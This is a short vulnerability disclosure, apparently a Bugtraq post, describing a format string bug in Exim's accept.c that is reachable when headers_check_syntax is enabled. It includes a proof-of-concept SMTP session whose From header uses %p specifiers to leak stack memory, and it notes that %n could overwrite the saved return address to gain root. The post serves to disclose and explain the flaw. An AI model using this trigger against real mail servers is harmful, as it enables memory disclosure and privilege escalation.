lil' exim format bug

Hi BugTrackers

Just a little bug to tell:

THE BUG

accept.c, line 2506:
else if (smtp_reply != NULL) moan_smtp_batch(NULL, smtp_reply);

while moan_smtp_batch is like this:
moan_smtp_batch(char *cmd_buffer, char *format, …)

So when smtp_reply contains format strings, it get transformed by
moan_smtp_batch().

Why I said that it's a little bug?

This piece of code is only executed when exim is configured to check incoming
mails' headers:
/etc/exim.conf should have an option set:
headers_check_syntax

By default it's turned OFF.
only few ppl turn it on.

So it's NOT vulnerable BY DEFAULT.

Exploitation:

Try this:
===8<======8<=======8<======
lez:~$ /usr/sbin/exim -bS
mail from:lez@lez
rcpt to:hax0r@lez
data
From:@@%p%p%p%p%p%p%p%p%p%p

.
===8<======8<=======8<=======

Somewhere in the answers you should see:
550 Syntax error in 'From' header: domain missing or malformed: failing address is:
@@0x80beba00x804d2690x80be6600x80be6680x80bd050(nil)(nil)(nil)(nil)0x80b9d40

If you change %p's to %s's, you get segfault. With carefully constructed thing,
it's easy to overwrite saved eip with %n's, and get root out of this bug.

No exploit yet, but after the many local format bug exploits it's not a big work to
write one for a skilled man.

Megyer Laszlo (Lez)
[email protected]